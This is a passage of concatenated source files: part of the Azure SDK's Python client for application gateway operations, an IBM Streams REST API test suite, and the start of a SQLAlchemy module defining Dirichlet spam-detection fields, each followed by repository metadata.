request = self._client.get(url, query_parameters)
response = self._client.send(
request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
return response
# Deserialize response
deserialized = models.ApplicationGatewayPaged(internal_paging, self._deserialize.dependencies)
if raw:
header_dict = {}
client_raw_response = models.ApplicationGatewayPaged(internal_paging, self._deserialize.dependencies, header_dict)
return client_raw_response
return deserialized
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/applicationGateways'}
def list_all(
self, custom_headers=None, raw=False, **operation_config):
"""Gets all the application gateways in a subscription.
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator like instance of ApplicationGateway
:rtype:
~azure.mgmt.network.v2017_11_01.models.ApplicationGatewayPaged[~azure.mgmt.network.v2017_11_01.models.ApplicationGateway]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
def internal_paging(next_link=None, raw=False):
if not next_link:
# Construct URL
url = self.list_all.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(
request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
return response
# Deserialize response
deserialized = models.ApplicationGatewayPaged(internal_paging, self._deserialize.dependencies)
if raw:
header_dict = {}
client_raw_response = models.ApplicationGatewayPaged(internal_paging, self._deserialize.dependencies, header_dict)
return client_raw_response
return deserialized
list_all.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/applicationGateways'}
def _start_initial(
self, resource_group_name, application_gateway_name, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.start.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'applicationGatewayName': self._serialize.url("application_gateway_name", application_gateway_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200, 202]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def start(
self, resource_group_name, application_gateway_name, custom_headers=None, raw=False, polling=True, **operation_config):
"""Starts the specified application gateway.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param application_gateway_name: The name of the application gateway.
:type application_gateway_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns None or
ClientRawResponse<None> if raw==True
:rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._start_initial(
resource_group_name=resource_group_name,
application_gateway_name=application_gateway_name,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
start.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/applicationGateways/{applicationGatewayName}/start'}
def _stop_initial(
self, resource_group_name, application_gateway_name, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.stop.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'applicationGatewayName': self._serialize.url("application_gateway_name", application_gateway_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200, 202]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def stop(
self, resource_group_name, application_gateway_name, custom_headers=None, raw=False, polling=True, **operation_config):
"""Stops the specified application gateway in a resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param application_gateway_name: The name of the application gateway.
:type application_gateway_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns None or
ClientRawResponse<None> if raw==True
:rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._stop_initial(
resource_group_name=resource_group_name,
application_gateway_name=application_gateway_name,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
stop.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/applicationGateways/{applicationGatewayName}/stop'}
def _backend_health_initial(
self, resource_group_name, application_gateway_name, expand=None, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.backend_health.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'applicationGatewayName': self._serialize.url("application_gateway_name", application_gateway_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200, 202]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('ApplicationGatewayBackendHealth', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def backend_health(
self, resource_group_name, application_gateway_name, expand=None, custom_headers=None, raw=False, polling=True, **operation_config):
"""Gets the backend health of the specified application gateway in a
resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param application_gateway_name: The name of the application gateway.
:type application_gateway_name: str
:param expand: Expands BackendAddressPool and BackendHttpSettings
referenced in backend health.
:type expand: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns
ApplicationGatewayBackendHealth or
ClientRawResponse<ApplicationGatewayBackendHealth> if raw==True
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.network.v2017_11_01.models.ApplicationGatewayBackendHealth]
or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.network.v2017_11_01.models.ApplicationGatewayBackendHealth]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._backend_health_initial(
resource_group_name=resource_group_name,
application_gateway_name=application_gateway_name,
expand=expand,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
deserialized = self._deserialize('ApplicationGatewayBackendHealth', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
backend_health.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/applicationGateways/{applicationGatewayName}/backendhealth'}
def list_available_waf_rule_sets(
self, custom_headers=None, raw=False, **operation_config):
"""Lists all available web application firewall rule sets.
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: ApplicationGatewayAvailableWafRuleSetsResult or
ClientRawResponse if raw=true
:rtype:
~azure.mgmt.network.v2017_11_01.models.ApplicationGatewayAvailableWafRuleSetsResult
or ~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.list_available_waf_rule_sets.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('ApplicationGatewayAvailableWafRuleSetsResult', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
list_available_waf_rule_sets.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/applicationGatewayAvailableWafRuleSets'}
def list_available_ssl_options(
self, custom_headers=None, raw=False, **operation_config):
"""Lists available Ssl options for configuring Ssl policy.
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: ApplicationGatewayAvailableSslOptions or ClientRawResponse if
raw=true
:rtype:
~azure.mgmt.network.v2017_11_01.models.ApplicationGatewayAvailableSslOptions
or ~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.list_available_ssl_options.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('ApplicationGatewayAvailableSslOptions', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
list_available_ssl_options.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/applicationGatewayAvailableSslOptions/default'}
def list_available_ssl_predefined_policies(
self, custom_headers=None, raw=False, **operation_config):
"""Lists all SSL predefined policies for configuring Ssl policy.
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator like instance of
ApplicationGatewaySslPredefinedPolicy
:rtype:
~azure.mgmt.network.v2017_11_01.models.ApplicationGatewaySslPredefinedPolicyPaged[~azure.mgmt.network.v2017_11_01.models.ApplicationGatewaySslPredefinedPolicy]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
def internal_paging(next_link=None, raw=False):
if not next_link:
# Construct URL
url = self.list_available_ssl_predefined_policies.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(
request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
return response
# Deserialize response
deserialized = models.ApplicationGatewaySslPredefinedPolicyPaged(internal_paging, self._deserialize.dependencies)
if raw:
header_dict = {}
client_raw_response = models.ApplicationGatewaySslPredefinedPolicyPaged(internal_paging, self._deserialize.dependencies, header_dict)
return client_raw_response
return deserialized
list_available_ssl_predefined_policies.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/applicationGatewayAvailableSslOptions/default/predefinedPolicies'}
def get_ssl_predefined_policy(
self, predefined_policy_name, custom_headers=None, raw=False, **operation_config):
"""Gets Ssl predefined policy with the specified policy name.
:param predefined_policy_name: Name of Ssl predefined policy.
:type predefined_policy_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: ApplicationGatewaySslPredefinedPolicy or ClientRawResponse if
raw=true
:rtype:
~azure.mgmt.network.v2017_11_01.models.ApplicationGatewaySslPredefinedPolicy
or ~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get_ssl_predefined_policy.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'predefinedPolicyName': self._serialize.url("predefined_policy_name", predefined_policy_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('ApplicationGatewaySslPredefinedPolicy', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_ssl_predefined_policy.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/applicationGatewayAvailableSslOptions/default/predefinedPolicies/{predefinedPolicyName}'}
| {
"content_hash": "b013ade93f642f33ba63f7867296f7e3",
"timestamp": "",
"source": "github",
"line_count": 1014,
"max_line_length": 199,
"avg_line_length": 48.234714003944774,
"alnum_prop": 0.6574933551420977,
"repo_name": "lmazuel/azure-sdk-for-python",
"id": "7723e995d21312a9544433999eb1478841f72a5e",
"size": "49384",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "azure-mgmt-network/azure/mgmt/network/v2017_11_01/operations/application_gateways_operations.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "42572767"
}
],
"symlink_target": ""
} |
import logging
import json
import unittest
import time
import uuid
import os
import urllib.parse as urlparse
from operators import DelayedTupleSourceWithLastTuple
from requests import exceptions
from streamsx.topology.tester import Tester
from streamsx.topology import topology, schema
from streamsx.topology.context import ConfigParams, JobConfig
from streamsx.rest import StreamsConnection
from streamsx.rest_primitives import Instance
import streamsx.spl.op as op
import streamsx.spl.toolkit
import streamsx.spl.types
from streamsx.rest_primitives import *
import primitives_caller
logger = logging.getLogger('streamsx.test.rest_test')
def _get_distributed_sc():
# 4.3 on-prem
if 'STREAMS_DOMAIN_ID' in os.environ:
sc = StreamsConnection()
sc.session.verify = False
return sc
return Instance.of_endpoint(verify=False).rest_client._sc
@unittest.skipUnless('STREAMS_INSTANCE_ID' in os.environ, 'Distributed setup required')
class TestDistributedRestFeatures(unittest.TestCase):
def setUp(self):
Tester.setup_distributed(self)
self.test_config[ConfigParams.SSL_VERIFY] = False
self.sc = _get_distributed_sc()
self.sc.session.verify = False
self.test_config[ConfigParams.STREAMS_CONNECTION] = self.sc
@classmethod
def setUpClass(cls):
"""
Initialize the logger and get the SWS username, password, and REST URL.
:return: None
"""
cls.is_v2 = None
cls.logger = logger
def test_username_and_password(self):
self.logger.debug("Beginning test: test_username_and_password.")
# Ensure, at minimum, that the StreamsContext can connect and retrieve valid data from the SWS resources path
resources = self.sc.get_resources()
self.logger.debug("Number of retrieved resources is: " + str(len(resources)))
self.assertGreater(len(resources), 0, msg="Returned zero resources from the \"resources\" endpoint.")
def test_streamsconnection_samplecode(self):
self.logger.debug("Beginning test: test_streamsconnection_samplecode.")
domains = self.sc.get_domains()
if domains is not None:
self.assertGreater(len(domains), 0, msg="Should have more than 0 domains.")
instances = self.sc.get_instances()
self.assertGreater(len(instances), 0, msg="Should have more than 0 instances.")
jobs_count = 0
for instance in instances:
jobs_count += len(instance.get_jobs())
def _verify_basic_view(self):
q = self._view.start_data_fetch()
try:
view_tuple_value = q.get(block=True, timeout=25.0)
except:
logger.exception("Timed out while waiting for tuple.")
raise
self._view.stop_data_fetch()
self.logger.debug("Returned view value in basic_view_support is " + view_tuple_value)
self.assertTrue(view_tuple_value.startswith('hello'))
def test_basic_view_support(self):
self.logger.debug("Beginning test: test_basic_view_support.")
top = topology.Topology()
# Send only one tuple
stream = top.source(DelayedTupleSourceWithLastTuple(['hello'], 20))
self._view = stream.view(start=True, buffer_time=60)
# Temporary workaround for Bluemix TLS issue with views
#stream.publish(schema=schema.CommonSchema.String, topic="__test_topic::test_basic_view_support")
self.logger.debug("Beginning compilation and submission of basic_view_support topology.")
tester = Tester(top)
tester.local_check = self._verify_basic_view
tester.test(self.test_ctxtype, self.test_config)
def _verify_job_refresh(self):
result = self.tester.submission_result
self.job = result.job
self.assertEqual('healthy', self.job.health)
def test_job_refresh(self):
top = topology.Topology()
src = top.source(['Hello'])
self.tester = Tester(top)
self.tester.tuple_count(src, 1)
self.tester.local_check = self._verify_job_refresh
self.tester.test(self.test_ctxtype, self.test_config)
# Job was cancelled by test wait for health to change
timeout = 10
while hasattr(self.job, 'health') and 'healthy' == self.job.health:
time.sleep(0.2)
timeout -= 1
try:
self.job.refresh()
except exceptions.HTTPError:
self.job = None
break
self.assertGreaterEqual(timeout, 0, msg='Timeout exceeded while waiting for job to cancel')
if hasattr(self.job, 'health'):
self.assertNotEqual('healthy', self.job.health)
def _call_rest_apis(self):
job = self.tester.submission_result.job
self.assertIsInstance(job, Job)
primitives_caller.check_job(self, job)
instance = job.get_instance()
self.assertIsInstance(instance, Instance)
primitives_caller.check_instance(self, instance)
job_alt = instance.get_job(id=job.id)
domain = instance.get_domain()
if domain is not None:
self.assertIsInstance(domain, Domain)
primitives_caller.check_domain(self, domain)
nops = job.get_operators(name='.*BASIC.$')
self.assertEqual(2, len(nops))
nops = job.get_operators(name='.*BASICD$')
self.assertEqual(1, len(nops))
self.assertTrue(nops[0].name.endswith('BASICD'))
def test_basic_calls(self):
"""
Test the basic rest apis.
"""
top = topology.Topology()
src = top.source(['Rest', 'tester'])
src = src.filter(lambda x : True, name='BASICC')
src.view()
src = src.map(lambda x : x, name='BASICD')
self.tester = Tester(top)
self.tester.tuple_count(src, 2)
self.tester.local_check = self._call_rest_apis
self.tester.test(self.test_ctxtype, self.test_config)
# Underscore as the local evironment must match the remote environment
# such as OS version and architecture type.
def _test_instance_submit(self):
""" Test submitting a bundle from an Instance.
Tests all four mechanisms.
"""
sab_name = 'ISJ_'+uuid.uuid4().hex
topo = topology.Topology(sab_name, namespace='myinstancens')
s = op.Source(topo, "spl.utility::Beacon",
'tuple<uint64 seq>',
params = {'period': 0.02, 'iterations':100})
s.seq = s.output('IterationCount()')
f = op.Map('spl.relational::Filter', s.stream,
params = {'filter': op.Expression.expression('seq % 2ul == 0ul')})
bb = streamsx.topology.context.submit('BUNDLE', topo, {})
self.assertIn('bundlePath', bb)
self.assertIn('jobConfigPath', bb)
sc = self.sc
instances = sc.get_instances()
if len(instances) == 1:
instance = instances[0]
else:
instance = sc.get_instance(os.environ['STREAMS_INSTANCE_ID'])
job = instance.submit_job(bb['bundlePath'])
self.assertIsInstance(job, Job)
self.assertEqual('myinstancens::'+sab_name, job.applicationName)
job.cancel()
with open(bb['jobConfigPath']) as fp:
jc = JobConfig.from_overlays(json.load(fp))
jn = 'JN_'+uuid.uuid4().hex
jc.job_name = jn
job = instance.submit_job(bb['bundlePath'], jc)
self.assertIsInstance(job, Job)
self.assertEqual('myinstancens::'+sab_name, job.applicationName)
self.assertEqual(jn, job.name)
job.cancel()
ab = instance.upload_bundle(bb['bundlePath'])
self.assertIsInstance(ab, ApplicationBundle)
job = ab.submit_job()
self.assertIsInstance(job, Job)
self.assertEqual('myinstancens::'+sab_name, job.applicationName)
job.cancel()
jn = 'JN_'+uuid.uuid4().hex
jc.job_name = jn
job = ab.submit_job(jc)
self.assertIsInstance(job, Job)
self.assertEqual('myinstancens::'+sab_name, job.applicationName)
self.assertEqual(jn, job.name)
job.cancel()
os.remove(bb['bundlePath'])
os.remove(bb['jobConfigPath'])
instance_response_keys = [
"auto_stop",
"plan",
"state",
"id",
"status",
"maximum",
"crn",
"size",
"documentation",
"streams_self",
"enabled",
"job_count",
"jobs",
"streams_console",
"minimum",
"self"
]
from streamsx.rest_primitives import _IAMConstants
from streamsx.rest import StreamingAnalyticsConnection
class TestSasRestFeatures(TestDistributedRestFeatures):
def setUp(self):
Tester.setup_streaming_analytics(self, force_remote_build=True)
self.sc = StreamingAnalyticsConnection()
self.test_config[ConfigParams.STREAMS_CONNECTION]=self.sc
self.is_v2 = False
if _IAMConstants.V2_REST_URL in self.sc.session.auth._credentials:
self.is_v2 = True
# The underscore in front of this test causes it to be skipped by default
# This is to prevent the starting and stopping of the instance from
# interfering with other tests.
# The test can be run manually:
# python -m unittest test_rest_bluemix.TestRestFeaturesBluemix._test_service_stop_start
def _test_service_stop_start(self):
self.logger.debug("Beginning test: test_service_stop_start")
sas = self.sc.get_streaming_analytics()
status = sas.get_instance_status()
self.valid_response(status)
self.assertEqual('running', status['status'])
res = sas.stop_instance()
self.valid_response(res)
status = sas.get_instance_status()
self.assertEqual('stopped', status['status'])
res = sas.start_instance()
self.valid_response(res)
status = sas.get_instance_status()
self.assertEqual('running', status['status'])
def valid_response(self, res):
for key in instance_response_keys:
self.assertTrue(key in res)
# The underscore in front of this test causes it to be skipped by default
# This is because the test must run on an os version that matches
# the service and has a local Streams Install.
# python3 -m unittest test_rest_bluemix.TestRestFeaturesBluemix._test_submit_sab
def _test_submit_sab(self):
sab_name = 'Sab_'+uuid.uuid4().hex
topo = topology.Topology(sab_name, namespace='mynamespace')
s = topo.source([1,2])
es = s.for_each(lambda x : None)
bb = streamsx.topology.context.submit('BUNDLE', topo, {})
self.assertIn('bundlePath', bb)
self.assertIn('jobConfigPath', bb)
sas = self.sc.get_streaming_analytics()
sr = sas.submit_job(bundle=bb['bundlePath'])
job_id = sr.get('id', sr.get('jobId'))
self.assertIsNotNone(job_id)
self.assertIn('name', sr)
self.assertIn('application', sr)
self.assertEqual('mynamespace::' + sab_name, sr['application'])
cr = sas.cancel_job(job_id=job_id)
jn = 'SABTEST:' + uuid.uuid4().hex
jc = streamsx.topology.context.JobConfig(job_name=jn)
sr = sas.submit_job(bundle=bb['bundlePath'], job_config=jc)
job_id = sr.get('id', sr.get('jobId'))
self.assertIsNotNone(job_id)
self.assertIn('application', sr)
self.assertEqual('mynamespace::'+sab_name, sr['application'])
self.assertIn('name', sr)
self.assertEqual(jn, sr['name'])
cr = sas.cancel_job(job_id=job_id)
os.remove(bb['bundlePath'])
os.remove(bb['jobConfigPath'])
| {
"content_hash": "e4684882dcd2de4f344de5d11ea124ff",
"timestamp": "",
"source": "github",
"line_count": 325,
"max_line_length": 117,
"avg_line_length": 36.01846153846154,
"alnum_prop": 0.6325815820946523,
"repo_name": "IBMStreams/streamsx.topology",
"id": "c3fa302ad5d542fccafb6d92e357c2c5dfaee52e",
"size": "11706",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "test/python/rest/test_rest.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "15862"
},
{
"name": "C++",
"bytes": "189639"
},
{
"name": "HTML",
"bytes": "11074"
},
{
"name": "Java",
"bytes": "2253833"
},
{
"name": "Makefile",
"bytes": "10174"
},
{
"name": "Perl",
"bytes": "2563"
},
{
"name": "Python",
"bytes": "1949128"
},
{
"name": "Raku",
"bytes": "37043"
},
{
"name": "Scala",
"bytes": "11007"
},
{
"name": "Shell",
"bytes": "16265"
}
],
"symlink_target": ""
} |
from sqlalchemy.ext.declarative import declared_attr
from sqlalchemy import (Column, Integer, Float, String, Boolean,
ForeignKey, DateTime, Sequence, and_)
class UserDirichletMixin(object):
""" Field of this class contains information necessary for spam detection
according to dirichlet method."""
@declared_attr
def sd_base_u_n(cls):
return Column(Float, default=0)
@declared_attr
def sd_base_u_p(cls):
return Column(Float, default=0)
@declared_attr
def sd_reliab(cls):
""" Spam detection reliability is computed based on u_n and u_p."""
return Column(Float, default=0)
@declared_attr
def sd_u_n(cls):
return Column(Float, default=0)
@declared_attr
def sd_u_p(cls):
return Column(Float, default=0)
@declared_attr
def sd_karma_user_base_u_n(cls):
return Column(Float, default=0)
@declared_attr
def sd_karma_user_base_u_p(cls):
return Column(Float, default=0)
@declared_attr
def sd_karma_user_reliab(cls):
""" Spam detection reliability"""
return Column(Float, default=0)
@declared_attr
def sd_karma_user_u_n(cls):
return Column(Float, default=0)
@declared_attr
def sd_karma_user_u_p(cls):
return Column(Float, default=0)
class ItemDirichletMixin(object):
""" Item fields which contains information necessary for spam detection
according to Dirichlet algorithm."""
@declared_attr
def sd_c_n(cls):
""" 'Number' of negative votes for the item"""
return Column(Float, default=0)
@declared_attr
def sd_c_p(cls):
""" 'Number' of positive votes for the item"""
return Column(Float, default=0)
@declared_attr
def sd_weight(cls):
""" weight_spam_k is a weight of an item wich computed in Karger's
